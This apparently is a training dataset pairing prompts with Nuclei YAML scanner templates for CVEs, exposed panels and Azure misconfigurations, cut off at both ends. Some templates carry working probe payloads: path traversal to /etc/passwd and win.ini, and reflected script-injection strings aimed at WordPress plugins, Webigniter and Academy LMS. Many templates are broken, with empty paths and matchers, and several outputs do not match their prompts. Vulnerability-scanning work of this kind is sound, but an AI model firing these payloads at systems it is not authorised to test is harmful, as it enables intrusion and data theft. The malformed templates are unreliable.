pikpikcu,gtrrnr\n severity: medium\n description: Bitrix Site Management Russia 2.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: redirect,bitrix,packetstorm,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}{{paths}}\" \n matchers:\n - type: regex\n part: header\n - type: status\n status:\n - 302\n condition: or", "category": "cwe", "severity": "high", "id": "CWE-601"} {"instruction": "Generate a Nuclei template to detect Improper Neutralization of Script-Related HTML Tags in a Web Page", "input": "Title: Improper Neutralization of Script-Related HTML Tags in a Web Page (CWE-80)\nSummary: The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"<\", \">\", and \"&\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.\nVulnerability Type: Improper Neutralization of Script-Related HTML Tags in a Web Page\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: wordpress-wordfence-xss\n\ninfo:\n name: WordPress Wordfence 7.4.6 - Cross0Site Scripting\n author: madrobot\n severity: medium\n description: WordPress Wordfence 7.4.6 is vulnerable to cross-site scripting.\n tags: wordpress,wp-plugin,xss,wordfence,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Wordfence Security - \" \n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E\" \n matchers:\n - type: word\n words:\n - \"'>\"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-80"} {"instruction": "Generate a Nuclei template for CVE-2024-37393", "input": "Title: Vulnerability (CWE-319) in securenvoy multi-factor_authentication_solutions\nSummary: Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\nVulnerability Type: Vulnerability (CWE-319)\nSeverity: high\nAffected Products: securenvoy multi-factor_authentication_solutions\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-37393\n\ninfo:\n name: SecurEnvoy Two Factor Authentication - LDAP Injection\n author: s4e-io\n severity: critical\n description: Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n tags: cve,cve2024,securenvoy,ldap,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2024-37393"} {"instruction": "Generate a Nuclei template for CVE-2019-0192", "input": "Title: Deserialization of Untrusted Data in apache solr and others\nSummary: In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: apache solr, netapp storage_automation_store\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-0192\n\ninfo:\n name: Apache Solr - Deserialization of Untrusted Data\n author: hnd3884\n severity: critical\n description: In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.\n tags: cve,cve2019,apache,solr,deserialization,rce,oast,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2019-0192"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: royalevent-management-panel\n\ninfo:\n name: Royal Event Management System Admin Panel - Detect\n author: ritikchaddha\n severity: info\n description: Royal Event Management System admin panel was detected.\n tags: royalevent,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/royal_event/\" \n matchers:\n - type: word\n words:\n - \"Royal Event Management Software\" \n - \"Welcome Administrator\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2010-1540", "input": "Title: Path Traversal in myblog com_myblog\nSummary: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. NOTE: some of these details are obtained from third party information.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: myblog com_myblog\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-1540\n\ninfo:\n name: Joomla! Component com_blog - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.\n tags: cve2010,cve,joomla,lfi,edb,myblog,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2010-1540"} {"instruction": "Generate a Nuclei template for CVE-2025-48828", "input": "Title: Vulnerability (CWE-424) in vbulletin vbulletin\nSummary: Certain vBulletin versions might allow attackers to execute arbitrary PHP code by abusing Template Conditionals in the template engine. By crafting template code in an alternative PHP function invocation syntax, such as the \"var_dump\"(\"test\") syntax, attackers can bypass security checks and execute arbitrary PHP code, as exploited in the wild in May 2025.\nVulnerability Type: Vulnerability (CWE-424)\nSeverity: critical\nAffected Products: vbulletin vbulletin\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-48828\n\ninfo:\n name: vBulletin replaceAdTemplate - Remote Code Execution\n author: DhiyaneshDK, Chocapikk\n severity: critical\n description: vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted conditional that executes arbitrary PHP code via passthru($_POST[]), and triggering it with a second request to ajax/render/ad_, attackers can run arbitrary commands on the server as the webserver user.\n tags: cve,cve2025,rce,vbulletin,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2025-48828"} {"instruction": "Generate a Nuclei template for: Azure PostgreSQL Flexible Server log_checkpoints Disabled", "input": "Title: Azure PostgreSQL Flexible Server log_checkpoints Disabled\nSummary: Azure PostgreSQL Flexible Server log_checkpoints Disabled. Ensure that \"log_checkpoints\" server parameter is enabled for all PostgreSQL flexible database servers available within your Microsoft Azure cloud account. The \"log_checkpoints\" parameter allows checkpoints and restart points to be logged in the Azure PostgreSQL server log.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-postgres-log-checkpoints-disabled\n\ninfo:\n name: Azure PostgreSQL Flexible Server log_checkpoints Disabled\n author: princechaddha\n severity: medium\n description: Ensure that \"log_checkpoints\" server parameter is enabled for all PostgreSQL flexible database servers available within your Microsoft Azure cloud account. The \"log_checkpoints\" parameter allows checkpoints and restart points to be logged in the Azure PostgreSQL server log.\n tags: cloud,devops,azure,microsoft,postgres,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-postgres-log-checkpoints-disabled"} {"instruction": "Generate a Nuclei template for: Instatus API Test", "input": "Title: Instatus API Test\nSummary: Instatus API Test. Post to and update maintenance and incidents on your status page through an HTTP REST API\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-instatus\n\ninfo:\n name: Instatus API Test\n author: daffainfo\n severity: info\n description: Post to and update maintenance and incidents on your status page through an HTTP REST API\n tags: token-spray,instatus\n\nhttp:\n - method: GET\n path:\n - \"https://api.instatus.com/v1/pages\" \n matchers:\n - type: word\n words:\n - \"\"id\":\" \n - \"\"subdomain\":\" \n - \"\"name\":\" \n - \"\"logoUrl\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-instatus"} {"instruction": "Generate a Nuclei template for: Sharp Multifunction Printers - Local File Inclusion", "input": "Title: Sharp Multifunction Printers - Local File Inclusion\nSummary: Sharp Multifunction Printers - Local File Inclusion. It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: sharp-printers-lfi\n\ninfo:\n name: Sharp Multifunction Printers - Local File Inclusion\n author: gy741\n severity: high\n description: It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer.\n tags: sharp,printer,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/installed_emanual_down.html?path=/manual/../../../etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"application/octet-stream; name=passwd\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "sharp-printers-lfi"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: black-duck-panel\n\ninfo:\n name: Black Duck Login Panel - Detect\n author: idealphase,ritikchaddha\n severity: info\n description: Black Duck login panel was detected.\n tags: panel,blackduck,synopsys,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"ProtexLoginPage\" \n - \"CCLoginPage\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: securenvoy-panel\n\ninfo:\n name: SecurEnvoy Login Panel - Detect\n author: 0xrod,righettod\n severity: info\n description: SecurEnvoy login panel was detected.\n tags: panel,securenvoy,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/secadmin/\" \n - \"{{BaseURL}}/securenvoy/\" \n - \"{{BaseURL}}/secenrol/\" \n - \"{{BaseURL}}/RDWeb\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"SecurEnvoy Portal\" \n - \"SecurEnvoy Tokenless Authentication\" \n - \"Manage My Token : Authentication\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Azure SQL Server Firewall Rule Create/Update/Delete Alert Not Configured", "input": "Title: Azure SQL Server Firewall Rule Create/Update/Delete Alert Not Configured\nSummary: Azure SQL Server Firewall Rule Create/Update/Delete Alert Not Configured. Ensure that an Azure activity log alert is fired whenever \u201cCreate\u201d, \u201cUpdate\u201d or \u201cDelete SQL Server Firewall Rule\u201d events are triggered in your Microsoft Azure cloud account. Activity log alerts get activated when a new activity log event that matches the condition specified in the alert occurs. In this case, the condition required for the alert is 'Whenever the Administrative Activity Log \"Create/Update/Delete server firew\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-sql-fw-rule-unalerted\n\ninfo:\n name: Azure SQL Server Firewall Rule Create/Update/Delete Alert Not Configured\n author: princechaddha\n severity: high\n description: Ensure that an Azure activity log alert is fired whenever \u201cCreate\u201d, \u201cUpdate\u201d or \u201cDelete SQL Server Firewall Rule\u201d events are triggered in your Microsoft Azure cloud account. Activity log alerts get activated when a new activity log event that matches the condition specified in the alert occurs. In this case, the condition required for the alert is 'Whenever the Administrative Activity Log \"Create/Update/Delete server firewall rule (Microsoft.Sql/servers/firewallRules)\" has \"any\" level, with \"any\" status and event is initiated by \"any\"'.\n tags: cloud,devops,azure,microsoft,sql-server,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-sql-fw-rule-unalerted"} {"instruction": "Generate a Nuclei template for CVE-2021-24746", "input": "Title: Cross-Site Scripting (XSS) in heateor sassy_social_share\nSummary: The Social Sharing Plugin WordPress plugin before 3.3.40 does not escape the viewed post URL before outputting it back in onclick attributes when the \"Enable 'More' icon\" option is enabled (which is the default setting), leading to a Reflected Cross-Site Scripting issue.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: heateor sassy_social_share\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24746\n\ninfo:\n name: WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting\n author: Supras\n severity: medium\n description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability.\n tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan,heateor,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/wp/v2/posts\" \n - \"{{BaseURL}}/{{slug}}/?a"><script>alert(document.domain)</script>\" \n matchers:\n - type: word\n words:\n - \"?a\">\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24746"} {"instruction": "Generate a Nuclei template for CVE-2021-27905", "input": "Title: Vulnerability (CWE-918) in apache solr\nSummary: The ReplicationHandler (normally registered at \"/replication\" under a Solr core) in Apache Solr has a \"masterUrl\" (also \"leaderUrl\" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the \"shards\" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: critical\nAffected Products: apache solr\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-27905\n\ninfo:\n name: Apache Solr <=8.8.1 - Server-Side Request Forgery\n author: hackergautam\n severity: critical\n description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at \"/replication\" under a Solr core) in Apache Solr has a \"masterUrl\" (also \"leaderUrl\" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the \"shards\" parameter.\n tags: cve2021,cve,apache,solr,ssrf,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"OK\" \n part: body", "category": "cve", "severity": "critical", "id": "CVE-2021-27905"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: weblogic-login\n\ninfo:\n name: Oracle WebLogic Login Panel - Detect\n author: bing0o,meme-lord\n severity: info\n description: Oracle WebLogic login panel was detected.\n tags: panel,oracle,weblogic,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/console/login/LoginForm.jsp\" \n matchers:\n - type: word\n words:\n - \"WebLogic\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: GeniusOcean Installer Exposure", "input": "Title: GeniusOcean Installer Exposure\nSummary: GeniusOcean Installer Exposure. GeniusOcean is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: geniusocean-installer\n\ninfo:\n name: GeniusOcean Installer Exposure\n author: DhiyaneshDk\n severity: high\n description: GeniusOcean is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,geniusocean,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/?step=1\" \n matchers:\n - type: word\n words:\n - \"GeniusOcean - Script Installer\" \n - \"GeniusOcean Installer\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "geniusocean-installer"} {"instruction": "Generate a Nuclei template for: SQL Server ReportViewer - Exposure", "input": "Title: SQL Server ReportViewer - Exposure\nSummary: SQL Server ReportViewer - Exposure. SQL Server ReportViewer page exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: sql-server-reportviewer\n\ninfo:\n name: SQL Server ReportViewer - Exposure\n author: kazet\n severity: high\n description: SQL Server ReportViewer page exposed.\n tags: misconfig,sql,report,exposure,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "sql-server-reportviewer"} {"instruction": "Generate a Nuclei template for CVE-2020-12800", "input": "Title: Unrestricted File Upload in codedropz drag_and_drop_multiple_file_upload_-_contact_form_7\nSummary: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nAffected Products: codedropz drag_and_drop_multiple_file_upload_-_contact_form_7\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-12800\n\ninfo:\n name: WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.\n tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"CVE-2020-12800-{{randstr}}\" \n part: body_2\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2020-12800"} {"instruction": "Generate a Nuclei template for CVE-2021-33851", "input": "Title: Cross-Site Scripting (XSS) in apasionados customize_login_image\nSummary: A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the \"Custom logo link\" executes whenever the user opens the Settings Page of the \"Customize Login Image\" Plugin.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: apasionados customize_login_image\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-33851\n\ninfo:\n name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting\n author: 8authur\n severity: medium\n description: WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2021-33851"} {"instruction": "Generate a Nuclei template for: Webigniter 28.7.23 - Cross-Site Scripting", "input": "Title: Webigniter 28.7.23 - Cross-Site Scripting\nSummary: Webigniter 28.7.23 - Cross-Site Scripting. The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3\">bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they lo\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: webigniter-xss\n\ninfo:\n name: Webigniter 28.7.23 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3\">bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login\n tags: xss,webigniter,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w\" \n - \"{{BaseURL}}/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"Webigniter\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "webigniter-xss"} {"instruction": "Generate a Nuclei template for CVE-2022-38553", "input": "Title: Cross-Site Scripting (XSS) in creativeitem academy_learning_management_system\nSummary: Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: creativeitem academy_learning_management_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-38553\n\ninfo:\n name: Academy Learning Management System <5.9.1 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve2022,cve,academylms,xss,creativeitem,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\" \n matchers:\n - type: word\n words:\n - \"\">\" \n - \"Study any topic\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-38553"} {"instruction": "Generate a Nuclei template for CVE-2023-22047", "input": "Title: Vulnerability (CWE-306) in oracle peoplesoft_enterprise\nSummary: Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\nVulnerability Type: Vulnerability (CWE-306)\nSeverity: high\nAffected Products: oracle peoplesoft_enterprise\nIndicators: unauthorized", "output": "id: CVE-2023-22047\n\ninfo:\n name: Oracle Peoplesoft - Unauthenticated File Read\n author: tuo4n8\n severity: high\n description: Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component- Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data.\n tags: cve,cve2023,oracle,peoplesoft,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/RP?wsrp-url=file:///etc/passwd\" \n - \"{{BaseURL}}/RP?wsrp-url=file:///c:\\windows\\win.ini\" \n matchers:\n - type: regex\n condition: or\n - type: word\n words:\n - \"content/unknown\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-22047"} {"instruction": "Generate a Nuclei template for: GitList Disclosure", "input": "Title: GitList Disclosure\nSummary: GitList Disclosure. GitList is exposed.. Tags: gitlist, misconfig, vuln\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: gitlist-disclosure\n\ninfo:\n name: GitList Disclosure\n author: dhiyaneshDK\n severity: low\n description: GitList is exposed.\n tags: gitlist,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"GitList\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "gitlist-disclosure"} {"instruction": "Generate a Nuclei template for CVE-2023-0334", "input": "Title: Unknown Vulnerability in shortpixel shortpixel_adaptive_images\nSummary: The ShortPixel Adaptive Images WordPress plugin before 3.6.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: shortpixel shortpixel_adaptive_images\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-0334\n\ninfo:\n name: ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin\n tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-0334"} {"instruction": "Generate a Nuclei template for: ProxyKingdom API Test", "input": "Title: ProxyKingdom API Test\nSummary: ProxyKingdom API Test. Rotating Proxy API that produces a working proxy on every request\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-proxykingdom\n\ninfo:\n name: ProxyKingdom API Test\n author: daffainfo\n severity: info\n description: Rotating Proxy API that produces a working proxy on every request\n tags: token-spray,proxykingdom\n\nhttp:\n - method: GET\n path:\n - \"https://api.proxykingdom.com/proxy?token={{token}}\" \n matchers:\n - type: word\n words:\n - \"\"address\"\" \n - \"\"port\"\" \n - \"\"protocol\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-proxykingdom"} {"instruction": "Generate a Nuclei template for: Codoso APT PlugX Malware Hash - Detect", "input": "Title: Codoso APT PlugX Malware Hash - Detect\nSummary: Codoso APT PlugX Malware Hash - Detect. Detects Codoso APT PlugX Malware.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: codoso-plugx-malware-hash\n\ninfo:\n name: Codoso APT PlugX Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Detects Codoso APT PlugX Malware.\n tags: malware,apt,codoso\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "codoso-plugx-malware-hash"} {"instruction": "Generate a Nuclei template for CVE-2021-24387", "input": "Title: Cross-Site Scripting (XSS) in contempothemes real_estate_7\nSummary: The WP Pro Real Estate 7 WordPress theme before 3.1.1 did not properly sanitise the ct_community parameter in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which can be triggered in both unauthenticated or authenticated user context\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: contempothemes real_estate_7\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24387\n\ninfo:\n name: WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting\n author: suman_kar\n severity: medium\n description: WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back.\n tags: cve,cve2021,xss,wordpress,wpscan,contempothemes,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \"/wp-content/themes/realestate\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24387"} {"instruction": "Generate a Nuclei template for: Network Camera FTP Service - Detect", "input": "Title: Network Camera FTP Service - Detect\nSummary: Network Camera FTP 